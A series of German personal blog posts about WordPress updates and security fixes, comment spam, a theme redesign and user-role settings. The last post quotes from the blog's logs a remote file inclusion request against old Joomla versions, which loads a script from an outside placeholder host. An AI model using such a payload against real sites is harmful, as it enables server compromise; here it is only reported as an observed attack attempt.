Erst gestern hatte ich die Blogsoftware auf den neuesten Stand gebracht, doch schon zur gleichen Zeit gab es einen schwerwiegenden Fehler bei WordPress. Durch einen Exploit konnten die Passwörter auch von Admin-Accounts zurückgesetzt werden und man war kurzerhand ausgesperrt. Kurz nach dem Bekanntwerden dieser ärgerlichen Sicherheitslücke schießt das Entwicklerteam das neue WordPress 2.8.4 nach, wodurch dieser Fehler behoben sein soll.
Ich hatte bereits eine Woche auf das Installieren der neuen Version gewartet, und ausgerechnet an dem Tag, als ich die Installation durchführte, musste natürlich dieser Bug auftauchen. Des Bloggers Herz muss sich also immer wieder mit Software auseinander setzen, die zwar kollaborativ von einer weltweiten Entwicklergemeinschaft erarbeitet wird, doch durch die menschlichen Fehler immer wieder Angriffsflächen bietet. Für jeden, der etwas mehr Wert auf Sicherheit legt, empfehle ich auch die etwas älteren, aber dennoch wirksamen Tipps von Sergej.
Das neue WordPress 2.6.5 ist seit kurzem im Original und in der deutschen Version frei verfügbar. Das neue Release schließt einige Sicherheitslücken (XSS-Exploits) und behebt kleine Probleme der verbreiteten Blogsoftware. Das Update läuft einwandfrei, und wer möchte, braucht auch nur die wp-includes/feed.php und wp-includes/version.php aktualisieren - das schließt zumindest die gravierenden Lücken. Der Sprung von Version 2.6.3 auf 2.6.5 ist durch eine fälschlich in Umlauf gebrachte, gefälschte Version 2.6.4 zustande gekommen. Wer sich eine 2.6.4 installiert haben sollte, hat sein Blog für Angreifer geöffnet. :)
Ein wenig Blogkultur am Rande: WordPress ist meiner Meinung nach das bestgepflegteste, am einfachsten zu bedienende Blog. Gerade für Neueinsteiger bietet sich hier nahezu alles, was das Blogger-Herz begehrt. Als Content-Management-System ist WordPress zumindest für kleine Projekte der kostenlose Überflieger am Markt, für das persönliche Blog oder Fachblogs kann ich es nur empfehlen.
Liebes SEO-Team der DiWe Media,
hört doch bitte einfach auf, in diversen Blogs, zu denen ich administrative Zugriffsrechte habe, mit euren sinnfreien Kommentaren eure eigenen Seiten zu bewerben. Welche Blogs dies sind, verrate ich natürlich an dieser Stelle nicht. Wozu auch - es sind genügend Stellen, an denen ich eure Kommentare aus der Moderationsschleife fischen konnte. Ich markiere euch einfach bei WordPress mit “Akismet” als Spam. Das Tool schickt damit eure URLs und E-Mail Adressen in einen zentralen Sammelpool, der auf internationaler Ebene euch in Kürze gänzlich auf verschiedenste Blacklists vollkommen automatisch reinsetzt. Dann ist es auch vorbei mit dieser Blogkommentarspammerei! Und habt ihr einen guten Clipping-Dienstleister, der auch Blogs für eure Medienbeobachtung aufnimmt? Na dann freut euch! Jetzt habt ihr meine ungeteilte Aufmerksamkeit. Denn das ganze Getue ist eigentlich kaum cool genug um bei Bloggern, insbesondere den webzwonulligen Bloggern, richtig Punkte zu sammeln.
Begeisterung macht sich breit. Innerlich fühle ich mich stolz, dass der Artikel “HowTo: Druckfunktion in Weblogs in knapp drei Tagen insgesamt 827 Mal gelesen wurde. Heute alleine wurde der Artikel bisher 81 Mal aufgerufen. Ich bin vom WordPress Plugin “Sayfa Sayac” alias “Post Read Counter” überrascht.
Trotzdem stellt sich mir die Frage, was für ein Schwachsinn manches Mal auf den Top-Positionen des Tages (und nicht der insgesamten Liste) seit der Integration vor ein paar Tagen aufläuft. Die Besucher, welche üblicherweise über Suchmaschinen eintrudeln, erfreuen sich an der Abmahnung von Yahoo an Icio.de, einem alten Popstars Artikel sowie dem Kuriositätenkabinett der Nachrichtenseiten - nebst einem Selbstgänger der Gegenklage von studiVZ.
Manchmal frage ich mich wirklich, was für verrückte Leute bei Google sind, die solche ollen Kamellen in den Suchergebnissen prinzipiell anklicken. Auch wenn die wissenschaftliche Welt gegen den Long-Tail kämpft, fühlt man sich doch irgendwie durch solche recht einfachen Statistiken bestätigt. Der Blogkultur sei Dank. :)
Feedleser aufgepasst - jetzt sollte man hier klicken! Das ist es - das neue Layout nach einer grundlegenden Bereinigung des Quellcodes vom WordPress-Theme. Gleich eine Frage an meine Leser: Wie findet ihr das neue Theme in der live-geschalteten Variante?
Ich brauchte sehr dringend etwas Veränderung. Nein, dies ist keine Veränderung im Sinne eines Abschieds der zwischenmenschlichen Kommunikation. Die Umgebung des täglichen (ahem…) Schreibens als Selbstreflektion des berüchtigten Seelenstriptease mit Coming-Out - also dem täglichen Bloggen - musste verändert werden. Daher entschied ich mich alles neu zu gestalten. Die alten Inhalte bleiben bestehen und ich verspreche auch ein wenig mehr Schreibaktivität. Das bin ich mir selbst und meinen Lesern schuldig. So sei es - ihr seht das neue Blog Layout mit viel Schweiß und Einsatz über die vergangenen Tage in kleiner mühevoller Fleißarbeit nach dem Arbeitsalltag und dem Familienleben erstellt.
Natürlich werden einige Dinge noch nachträglich ergänzt - hier ein kleiner Vorgeschmack:
- Ich muss die Magazin-Funktion implementieren - leider habe ich es nicht geschafft, das die Magazin-Funktion reibungslos umzusetzen. Als sich die Fehler- und Logikprobleme häuften, habe ich es kurzerhand abgestellt. Dann lieber mit dem Layout in der altbewährten Form starten, als dass man sich quälen muss.
- Finetuning im CSS muss noch erfolgen, da auf dem MS IE 5 ein weißer Querbalken zwischen den Header und Content Boxen liegt. Eine ganz üble Sache, aber wer außer mir hat den MS IE 5 eigentlich noch - mit Ausnahme zu Testzwecken?
- Für ein wenig Abwechslung im Header sorgt noch ein regelmäßig aktualisiertes Foto. Die dafür erforderliche Funktion habe ich schlichtweg weggelassen. Den Rest im Sinne einer Aktualisierung im Header erledigt die selbstgebastelte Twitter-Integration - sogar mit Cache und Timeout.
- Eventuell wird in der Sidebar etwas mehr auf Farben gesetzt, anstatt monotone Inhalte in Weiß bzw. Dunkelgrau anzubieten.
- Eine “Print”-Funktion wird mit einem eigenen CSS-Stylesheet ebenfalls nachgelegt. Mich hat es immer wieder gestört, dass Blogs eine “unter aller Sau” Druckfunktion bzw. Druckfähigkeit besitzen. Es geht dabei eher weniger um die Konvertierung der digitalen Daten auf old-school Papier, sondern das Erstellen von PDFs über die Druckfunktion.
- Das Theme soll in einer abgespeckten Variante zum Download angeboten werden - insbesondere wird hier nicht die Werbung von mir als Platzhalter gegen die Langeweile eingeblendet, sondern auf Widgets für die Sidebar gesetzt - wer Widgets mag, soll damit seinen Spaß haben - ich persönlich bin Hardcoder und verzichte auf vorgefertigte Widget-Lösungen, aber dahin geht ja bekanntlich der Trend.
- Optional werde ich das Blog mit einer Flickr-Integration erweitern. Vor knapp zwei bis drei Jahren hatte ich meinen Flickr-Account mit einem Gallerieplugin für WordPress eingebunden, jedoch hatte ich mit dem damaligen “freien” Benutzerkonto nie richtig Spaß gehabt. Jetzt habe ich mir einen Pro-Account geholt und diesen mit alten Fotos bestückt… weiteres folgt.
- Für informationsgeile Zeitgenossen kommt auch ein lustiger Pressebereich - über mich, über mich, über mich - eine sehr spezielle Informationsseite rund um das, was man nicht bereits vom hauseigenen XING-Profil kennt.
- Die Kategorien müssen noch bereinigt werden. Alte, irrelevante, überflüssige, redundante, absolut hinfällige Bezeichnungen sind die Überbleibsel aus knapp fünf Jahren bloggen! Oben sieht man bereits, dass ich auf “Blogkultur, Marketing, Medien, Public Relations, Web 2.0″ setze. Einige kleine Kategorien wie das “Familienleben” werde ich immer wieder einsetzen, aber “E Commerce” oder “Gametime”? Das ist hier überhaupt nicht das Thema mehr!
So das war’s. Ab in die Heia und viel Schlafen. Ich freue mich auf euer Feedback! Ich hoffe, dass das Blog mit allen Funktionen nahezu einwandfrei dargestellt wird. Ich muss nur bei Twitter darauf achten, nicht zu lange Wortkonstruktionen zu schreiben, die das Layout hier im Blog sprengen können… :)
Schnell schnell schnell! Weblogs sind wichtig und müssen sicher sein. Auch neue Features verträgt die Community. Ganz brandaktuell für heute gibt es die Updategefahr für WordPress: Tyner alias WordPress 2.6 ist zum Download auf der offiziellen WordPress-Seite erhältlich. Wer darauf steht, kann nachträgliche Änderungen an den Texten ähnlich des Wiki-Prinzips (vgl. Wikipedia) verfolgen. Außerdem ist die “Press this” Bookmarklet-Funktion einsatzreif. Weitere Details gibt es natürlich in der Auflistung - der Bequemlichkeit halber hier hineinkopiert:
- Word count! Never guess how many words are in your post anymore.
- Image captions, so you can add sweet captions like Political Ticker does under your images.
- Bulk management of plugins.
- A completely revamped image control to allow for easier inserting, floating, and resizing. It’s now fully integrated with the WYSIWYG.
- Drag-and-drop reordering of Galleries.
- Plugin update notification bubble.
- Customizable default avatars.
- You can now upload media when in full-screen mode.
- Remote publishing via XML-RPC and APP is now secure (off) by default, but you can turn it on easily through the options screen.
- Full SSL support in the core, and the ability to force SSL for security.
- You can now have many thousands of pages or categories with no interface issues.
- Ability to move your
wp-config
file and wp-content
directories to a custom location, for “clean” SVN checkouts.
- Select a range of checkboxes with “shift-click.”
- You can toggle between the Flash uploader and the classic one.
- A number of proactive security enhancements, including cookies and database interactions.
- Stronger better faster versions of TinyMCE, jQuery, and jQuery UI.
- Version 2.6 fixes approximately 194 bugs.
Wer jetzt updaten möchte - haut rein. Dennoch sollte man alles in Ruhe angehen und den Updateprozess nicht überhastet angehen, sondern alles schön brav koordinieren. :)
Ich lasse die Katze aus dem Sack. Bereits gestern durfte Ibo sein neues Bloglayout vorstellen - und da möchte ich nicht hinterher hinken. Der folgende Designentwurf stellt das neue Layout für den Telagon Sichelputzer dar. Auf die Meinung meiner Leser/innen bin ich natürlich sehr gespannt. Ich hoffe, dass ich das neue Theme in den Abendstunden des Wochenendes erstellen kann und insbesondere die Funktionalität des Magazin-Styles mit meinen WordPress- und PHP-Kenntnissen zum Einsatz bekomme. Zwei volle Abende mit etwas Rotwein und der Hilfe meiner beratenden Ehefrau brachten dieses Ergebnis zu Stande.
Wie ich bereits vor einigen Wochen ankündigen durfte, beflügelt mich die Idee vom Magazin-Style sehr. Das Layout zeigt dabei nur die Startseite sowie die Ansicht auf die Kategorien. Die Leseansicht für jeden Blogartikel wird einen in der Höhe schlankeren Header besitzen, eine mobile Version des Blogs plane ich ebenfalls. Wichtig ist meiner Meinung nach die klare Aufteilung in Content, Funktionalität (Sidebar in Grau) sowie einem Kooperations-Werbe-Bereich (Sidebar in weiß). Die selbstgeschossenen Fotos im Header werden im noch zu definierenden zeitlichen Wechsel automatisch ausgetauscht. Texte in diesem Entwurf sind entweder billig kopiert oder dummyhaft eingesetzt. Auch ist das Microblogging mit Twitter mir mittlerweile sehr wichtig. Daher auch die sehr intensive Integration im Headerbereich. Auch ich plane ebenfalls wie Ibo, daraus eine (vielleicht abgespeckte) Variante zu erstellen, die ich unter einer CC-Lizenz veröffentliche - sofern die eingesetzten Plugins und WordPress selbst diese Lizenzen unterstützen - schaun wir mal. Was denkt ihr vom bald kommenden Relaunch von sichelputzer.de ? Ich freue mich auf euer Feedback!
Es hat lange gedauert. Bis vor wenigen Minuten hielt ich meine eigene Variante von WordPress 2.3.3 auf Telagon Sichelputzer am Leben. Der Exitus musste kommen, und ich freue mich auf die segensreiche Zeit mit WordPress 2.5.1 - schneller, schöner, neuer, besser?
Ganz ehrlich - es geht so. Ich bin mit dem Admin-Interface absolut unzufrieden, doch zum Glück erspähte ich bei Frank den Hinweis auf die Plugin-Erweiterung vom Admin-Interface. Jetzt sieht alles besser aus, ein wenig bequemer und komfortabler als die für 800×600 Pixel getrimmte originale WordPress 2.5.1 Darstellung. Warum muss man sich in Zeiten von 24″ Bildschirmen noch mit solchen altbackenen Traditionen abfinden? :)
Sicherheit ist das Maß der Dinge. Ein sehr interessantes Feature stellte ich vor wenigen Minuten in der WordPress Administration fest. Sobald man im “Users”-Tab einen Benutzer editiert, hat man unter “Role” neben den üblichen Einstellungen auch die Auswahl für “No role for this blog”. Dokumentiert ist die Funktion zumindest nicht in der Form, dass man sie schnell über Google finden kann.
Jedoch hat es die Funktion wirklich in sich, wenn man einen Benutzer im Blog behalten möchte ohne dabei seine Blogeinträge zu löschen und dem Benutzer insbesondere keine administrativen Funktionen zu überlassen. Der gesamte Loginbereich von WordPress wird für den betroffenen Nutzer gesperrt: “You do not have sufficient permissions to access this page.”
Mir gefällt diese Methode eindeutig besser, als einen User zu einem Leser zu machen. Als Leser kann immer noch nachträglich der angezeigte Name (nicht Benutzername) in der WordPress Administration geändert werden. Die Vergabe eines funktionslosen Logins ist letztendlich für das öffentliche Auftreten in einem Blog ideal einsetzbar: Für privat betriebene Blogs eher kein Thema, doch in Hinblick auf Corporate Blogs kann mit dem Weggang eines Mitarbeiters die Frage auftauchen - Was machen wir jetzt mit den Blogeinträgen?
Sobald ein Mitarbeiter das Unternehmen verlässt, muss in WordPress nicht der Benutzer gelöscht werden und auch nicht die durchaus sicherheitskritische Einstellung “Registrierter Leser” gewählt werden. Vielmehr setzt man den Benutzer auf “No role for this blog” und bewahrt die bisherigen Blogeinträge, ohne dass daraus ein Problem generiert werden kann. Anmelden kann sich der Benutzer in dem Fall nicht mehr.
Ich nutze hier im Blog definitiv WordPress, aber zahlreiche Anfragen werden auf nicht-existente URLs gemacht, die wohl irgendwie eine Hintertür beim Joomla CMS öffnen sollen. Hier ein Beispiel:
/////////////?mosConfig_absolute_path=http://sonstwo.server.com/hack.txt
Scheinbar ist die mosConfig_absolute_path im Joomla CMS oder in veralteten Versionen absolut anfällig für zwischenmenschliche Schandtaten… naja, das wollte ich auch nur mal so mitteilen.